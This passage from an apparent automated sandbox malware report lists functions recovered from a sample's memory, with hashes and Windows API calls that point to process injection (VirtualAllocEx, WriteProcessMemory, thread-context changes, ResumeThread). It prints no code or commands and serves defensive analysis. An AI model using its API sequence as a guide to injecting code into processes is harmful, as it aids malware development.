                                              • Opcode Fuzzy Hash: 077ab1743afd96424d15aa0cabfb5ddc6870adefd845c422a507be0ace191068
                                              • Instruction Fuzzy Hash: A431F6B1E116188BEB18CFAAD8443DEBBF7AFC9310F14C16AD509AA255DB740946CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 026D8CB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1652 26d8cb0-26d8cc6 1653 26d8cce-26d8cd8 1652->1653 1654 26d8cc9 call 26d86e8 1652->1654 1655 26d8cda-26d8cdf 1653->1655 1656 26d8ce4-26d8d16 1653->1656 1654->1653 1657 26d8dc8-26d8dcf 1655->1657 1685 26d8d16 call 26d8ea0 1656->1685 1686 26d8d16 call 26d8e90 1656->1686 1661 26d8d1c-26d8d26 1662 26d8d28-26d8d2e 1661->1662 1663 26d8d34-26d8d46 1661->1663 1664 26d8d30 1662->1664 1665 26d8d32 1662->1665 1667 26d8d4c-26d8d6c 1663->1667 1668 26d8dd0-26d8e5f InternetGetConnectedState 1663->1668 1664->1663 1665->1663 1671 26d8d6e-26d8d74 1667->1671 1672 26d8d86-26d8d98 1667->1672 1674 26d8e68-26d8e89 1668->1674 1675 26d8e61-26d8e67 1668->1675 1676 26d8d78-26d8d84 1671->1676 1677 26d8d76 1671->1677 1672->1668 1681 26d8d9a-26d8dbd 1672->1681 1675->1674 1676->1672 1677->1672 1683 26d8dbf-26d8dc4 1681->1683 1684 26d8dc6 1681->1684 1683->1657 1684->1657 1685->1661 1686->1661
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2735547419.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_26d0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ConnectedInternetState
                                              • String ID: $jq$$jq$$jq
                                              • API String ID: 97057780-3696375380
                                              • Opcode ID: 9e413431988b71c823c23588bf934371146f87a463889f6e8845a367d4792e67
                                              • Instruction ID: 1da448a7707c945749b5c0b768c96c86da04716a40d478d5927231c5a27d009f
                                              • Opcode Fuzzy Hash: 9e413431988b71c823c23588bf934371146f87a463889f6e8845a367d4792e67
                                              • Instruction Fuzzy Hash: 4751E371E012199FDB14DF6AD944BAEBBF6FF88310F24802AD404A73D1DB389946CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CAD30 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHjq$PHjq
                                              • API String ID: 0-3092175318
                                              • Opcode ID: 8bdb3a1861ae91434348830c288ba6099d486c175d039444ef124cf30f38ae96
                                              • Instruction ID: dd3ad41735bbb2a2014b0eaec7dbe8f619252629a74068d8ad5caf345d98fbd4
                                              • Opcode Fuzzy Hash: 8bdb3a1861ae91434348830c288ba6099d486c175d039444ef124cf30f38ae96
                                              • Instruction Fuzzy Hash: 24C11574700218CFCB54DF68D994AADBBF2BF89711B2545ACE406AB3A1DB31EC41CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C2270 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (nq$Hnq
                                              • API String ID: 0-3116299003
                                              • Opcode ID: 89065d9a8374d10be71ee82757a574a2b947b7d378c8bb7d4346e0e7cc975e01
                                              • Instruction ID: 198e1bff52cd8a9e25a5c7a43f4663f2880f6212a2c432fc3ff29d2af1e1fef4
                                              • Opcode Fuzzy Hash: 89065d9a8374d10be71ee82757a574a2b947b7d378c8bb7d4346e0e7cc975e01
                                              • Instruction Fuzzy Hash: D15156316056809FC7959F2CD0547ADBBE3EF85300F1AC4EEE0899B796CA34AC46C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06068470 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 060686C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: ac9f9827dc1fd75c0e970a03ea845b792e294dbcace3b1d18c96a3683113ba55
                                              • Instruction ID: 484702817b4ed7f3c2f058d7c708c83d3416562e7a49371ea0a45987cff1bd4e
                                              • Opcode Fuzzy Hash: ac9f9827dc1fd75c0e970a03ea845b792e294dbcace3b1d18c96a3683113ba55
                                              • Instruction Fuzzy Hash: 6D714870A00B058FD7A4DF2AD44479ABBF5FF48300F00892DE48AD7A50E775E945CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07749BA8 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 30bfa9ee5a88cac8fff1f0dfb0a896a7d145dcf818829bc938d22535b2471b60
                                              • Instruction ID: 8b154ab31ecc1728deddd24233ea225fa7d9b9cef2966d8d8a4644fc9f901619
                                              • Opcode Fuzzy Hash: 30bfa9ee5a88cac8fff1f0dfb0a896a7d145dcf818829bc938d22535b2471b60
                                              • Instruction Fuzzy Hash: AED1B230A143048FCB06FFB8E59956DBBB6EF89240F4184AAE445E7369DF389C09CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0606ED11 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0606EE82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: f5ad3797edb67f6e5bde3ea7d9c0e02cbb23650f704096e96495b2371b461317
                                              • Instruction ID: 1d673225e48638369b5e40573c7b4859525d127dc5c0e677c4ea7d5cb4505989
                                              • Opcode Fuzzy Hash: f5ad3797edb67f6e5bde3ea7d9c0e02cbb23650f704096e96495b2371b461317
                                              • Instruction Fuzzy Hash: A951DEB5C10209AFDB55CF9AC984ADDBFB6FF48310F24816AE918AB220D7759845CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0606E178 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0606EE82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 8dbc1aa42e88959ae1ab73c538769c9a35b3b2b24104fbd97e9e52d1f00587ca
                                              • Instruction ID: 4183b1e45bf52850ce7bb554ce9a037c1a99ed33fd6c2ceb0fcca8b898db1040
                                              • Opcode Fuzzy Hash: 8dbc1aa42e88959ae1ab73c538769c9a35b3b2b24104fbd97e9e52d1f00587ca
                                              • Instruction Fuzzy Hash: DB5114B1C043599FDB11CFAAC890ADEBFB5FF49300F24816AE418AB265D7749845CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0606E1C0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0606EE82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 511d3e0c8d167afc2cf6cf72fc4389d1d7d09c99f43bbcc47e8d4c3e3321d4ba
                                              • Instruction ID: 73e38c0cb5203baee763a6b523c0f6289006a99ef6e6ec766c58af08c09ab4ba
                                              • Opcode Fuzzy Hash: 511d3e0c8d167afc2cf6cf72fc4389d1d7d09c99f43bbcc47e8d4c3e3321d4ba
                                              • Instruction Fuzzy Hash: AD51CDB5D103499FDB14CF9AC884ADEBFB5BF48300F24812AE819AB210D774A885CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06070C70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06070D31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745886832.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6070000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: d201b2509ddef401158ffaf62e5512ff17e00827a45ee8cc9d5e75f148f0576c
                                              • Instruction ID: ef789d95a119d44c12f659ddbeb636f6625025522ffdb20e447b9eb0542db90b
                                              • Opcode Fuzzy Hash: d201b2509ddef401158ffaf62e5512ff17e00827a45ee8cc9d5e75f148f0576c
                                              • Instruction Fuzzy Hash: 684115B4D00309CFDB54DF9AC848AAABBF5FB89314F24C559E519AB321D374A841CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07B29511 Relevance: 1.6, APIs: 1, Instructions: 84memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 07B295C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747875105.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7b20000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: f5086b89d0ba6a314e77c5b7f67568b5382c8f4c577e4fdb391b4f88eb25637b
                                              • Instruction ID: 132bf9421aa40a5566f6507ec158f3430b67905ef1c2c981e3134d6a52c0d674
                                              • Opcode Fuzzy Hash: f5086b89d0ba6a314e77c5b7f67568b5382c8f4c577e4fdb391b4f88eb25637b
                                              • Instruction Fuzzy Hash: 932159B590025ADFCB10CF9AD884ADEFBF5FB48324F10806AE558A7341C375A645CFA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79C1C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0D79C258
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 3cf6ab4d3fe5db82bdfefda46148af59366cc3f0123d805b4abfb5f184930f24
                                              • Instruction ID: 2cef401b656c562a3cd03927e7c7c261170999a8e3c0fb9ac11b3d9ea0217053
                                              • Opcode Fuzzy Hash: 3cf6ab4d3fe5db82bdfefda46148af59366cc3f0123d805b4abfb5f184930f24
                                              • Instruction Fuzzy Hash: 46212A719003499FCF10DFA9D945BEEBBF5FF48310F14842AE919A7250C7789544CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06069BD0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0606A906,?,?,?,?,?), ref: 0606A9C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 07e0f66986609bbc259ffab892d73b0d2c937a836aa167282c8a9c6d4b9e4d95
                                              • Instruction ID: 67a3acc28067ea873a485d8c446db5f2ce0ef52d96929a98e5042682e446139c
                                              • Opcode Fuzzy Hash: 07e0f66986609bbc259ffab892d73b0d2c937a836aa167282c8a9c6d4b9e4d95
                                              • Instruction Fuzzy Hash: 2121E5B59002489FDB10DF9AD984AEEBFF8EB48314F14841AE918B3310D379A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0606A938 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0606A906,?,?,?,?,?), ref: 0606A9C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: ce32f7472ea1304818002a0ac0f087e107a29e0bbdbc30320e6a054d3ce80818
                                              • Instruction ID: 4f6752ea5420b09f83f83b196a33555fe4810fc5738d7ffc4e424335f4f3350f
                                              • Opcode Fuzzy Hash: ce32f7472ea1304818002a0ac0f087e107a29e0bbdbc30320e6a054d3ce80818
                                              • Instruction Fuzzy Hash: 5021F6B5900248DFDB10DF9AD984AEEBFF4EF08314F14841AE958B7251D379A944CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79C948 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0D79C9C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: caa0bf337a9295cce5a171b9d0e281313b105e3fee1768244b8c35bc8e3433f6
                                              • Instruction ID: be48caa0bb64be22c21ce9700c878dac4544f0ae7a52446456e974caf308c83f
                                              • Opcode Fuzzy Hash: caa0bf337a9295cce5a171b9d0e281313b105e3fee1768244b8c35bc8e3433f6
                                              • Instruction Fuzzy Hash: 302118B1D002098FDB10DFAAC4857AEFBF4EF89320F54842AD559A7244CB78A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79B780 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0D79B7FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 835f75e4d091ec75f54d37cc2859842867cd4824ed91b724fa0d0b8b987eef49
                                              • Instruction ID: 7cd8357052828acb5941035caaa5cf89ae52aaa65ff03c6e02bdf14959956eca
                                              • Opcode Fuzzy Hash: 835f75e4d091ec75f54d37cc2859842867cd4824ed91b724fa0d0b8b987eef49
                                              • Instruction Fuzzy Hash: 76211871D002098FDB10DFAAD485BEEFBF4EF89324F14842AD519A7240DB789945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79C6C0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0D79C737
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 89b4f972cb074739de919fce46609b9b32f96b5a7c799cad646c236045e9e6bc
                                              • Instruction ID: 4bd0433df830f4a8c603114d49a77176e55d4dd5d3e9662a07778dcf20d014bd
                                              • Opcode Fuzzy Hash: 89b4f972cb074739de919fce46609b9b32f96b5a7c799cad646c236045e9e6bc
                                              • Instruction Fuzzy Hash: B22118718002499FDB10DFAAC844AEEFBF5EF48320F10842AE519A7250C7789945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 063C0B18 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000), ref: 063C9110
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2746528880.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_63c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 4ffb2e743c7b6018b9ff4f1e3729cd04ef53534877f3c851ed1e60b2cb3f684c
                                              • Instruction ID: 7d29cef79ec4f60f3e33b57ba38b529a334a3eb356c2f535f6dbb9000ded35cf
                                              • Opcode Fuzzy Hash: 4ffb2e743c7b6018b9ff4f1e3729cd04ef53534877f3c851ed1e60b2cb3f684c
                                              • Instruction Fuzzy Hash: 4C2115B1C006599BDB10DF9AC4457AEFBB4EF48320F11812AE818A7240D778A944CFE5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D7927D0 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0D79284B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 318a70259ee04e39fabe0fb7e780c9c75f62ada2b1511c593a07934de0128908
                                              • Instruction ID: a1ee41993fdc899a0f4648b8d5e51e3e49071dbd44ca8d38d4ac848cc082154b
                                              • Opcode Fuzzy Hash: 318a70259ee04e39fabe0fb7e780c9c75f62ada2b1511c593a07934de0128908
                                              • Instruction Fuzzy Hash: 4D2106B59002499FCB10DF9AD984BDEFBF4FF49320F10802AE958A7251D778A644CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07B29550 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 07B295C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747875105.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7b20000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: dca59c11ba965e7de339aa4c3d89fb5a5b7a0417174420eaaa63cbc4d9d241cc
                                              • Instruction ID: 9e291891469f0b1c9457cc8eb4a454ebf9c94e7de103d0be4fec6847fd82664f
                                              • Opcode Fuzzy Hash: dca59c11ba965e7de339aa4c3d89fb5a5b7a0417174420eaaa63cbc4d9d241cc
                                              • Instruction Fuzzy Hash: F22114B59002499FDB10DF9AC884BDEFBF4FF48320F108429E958A3250D378A645CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D7927D8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0D79284B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 84d98ef9b7b22ec215e8227ec696c3c647dd39b6abc83c48e724fcbf9ab4f16a
                                              • Instruction ID: b69ebc84504d31f5c160dee1e497f6e8c555f15343049771fec4856980b0f334
                                              • Opcode Fuzzy Hash: 84d98ef9b7b22ec215e8227ec696c3c647dd39b6abc83c48e724fcbf9ab4f16a
                                              • Instruction Fuzzy Hash: 2C21E4B59002499FCB10DF9AD884BDEFBF4FF49320F10842AE958A7251D378A544CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 026D86E8 Relevance: 1.6, APIs: 1, Instructions: 55networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetGetConnectedState.WININET(?,00000000), ref: 026D8E52
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2735547419.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_26d0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ConnectedInternetState
                                              • String ID:
                                              • API String ID: 97057780-0
                                              • Opcode ID: ee7aed59d7eca5bb7f16577706ff7dad2043eab103f427414dc677f94c73f176
                                              • Instruction ID: 612f31f6606089642accb2358f79b863c72141bd3e1a3954ed11b3ce79607814
                                              • Opcode Fuzzy Hash: ee7aed59d7eca5bb7f16577706ff7dad2043eab103f427414dc677f94c73f176
                                              • Instruction Fuzzy Hash: A511CFB1D002599BDB10DF9AC588AAEFBB8FB09314F10816AE518A3241D378A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06067F08 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06068741,00000800,00000000,00000000), ref: 06068952
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 8c213bfd2b6256e230c58f37b63ae1405d902a6820885b7d248fa526a9ccf56d
                                              • Instruction ID: feb68a401af88abe710748fbe71270a80f9b460c9080f574c919eaed3114fcab
                                              • Opcode Fuzzy Hash: 8c213bfd2b6256e230c58f37b63ae1405d902a6820885b7d248fa526a9ccf56d
                                              • Instruction Fuzzy Hash: 3E1112B6C003099FDB60DF9AD848AAEFBF4EB49314F14842AE519B7210C379A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79BE50 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0D79BEBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: c090266405fbf09bbacc40798ca35d49308bbcfc0fdafc46f60921cf81df02b3
                                              • Instruction ID: 4829bbde9b101c8473656902d2e26f1a64e55417f54bafd6390764d9abc848ce
                                              • Opcode Fuzzy Hash: c090266405fbf09bbacc40798ca35d49308bbcfc0fdafc46f60921cf81df02b3
                                              • Instruction Fuzzy Hash: B11137728002499FCB10DFAAD844AEFFFF5EF88320F148419E519A7250C779A944CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 060688E1 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06068741,00000800,00000000,00000000), ref: 06068952
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 4643189f3b66353502ecbdab14452859834a71c7d79eb8389c93f61a7b138ef3
                                              • Instruction ID: 84fde76b93844b81b93c689e0606829f8ddda83d5189dd0139713f30abc67705
                                              • Opcode Fuzzy Hash: 4643189f3b66353502ecbdab14452859834a71c7d79eb8389c93f61a7b138ef3
                                              • Instruction Fuzzy Hash: 911112B6C002498FDB14CF9AD544ADEFBF4EB48314F14842AE919B7200C378A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79E520 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,0D79F329,?,?), ref: 0D79F4D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: e4fccad038b619585410a3d25e6437469356b1ef088ba76acfe52d13ba61c02b
                                              • Instruction ID: 0ba932bba8b220d0848a678698670485ae887074b2e6d1352364c389afbaa132
                                              • Opcode Fuzzy Hash: e4fccad038b619585410a3d25e6437469356b1ef088ba76acfe52d13ba61c02b
                                              • Instruction Fuzzy Hash: 0D1113B68042498FDB20DF9AD444BAEFBF4EF48320F10845AD958A7350D378A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D79CBD0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 88b8ea2187f159d8ee1cc48a919a91465b4b054b3148b61a86b79de699b42ab4
                                              • Instruction ID: f9550a9eb69049b6acdd63b1d3ca5d0905353fa3fe19566fc03285f4a6a031fa
                                              • Opcode Fuzzy Hash: 88b8ea2187f159d8ee1cc48a919a91465b4b054b3148b61a86b79de699b42ab4
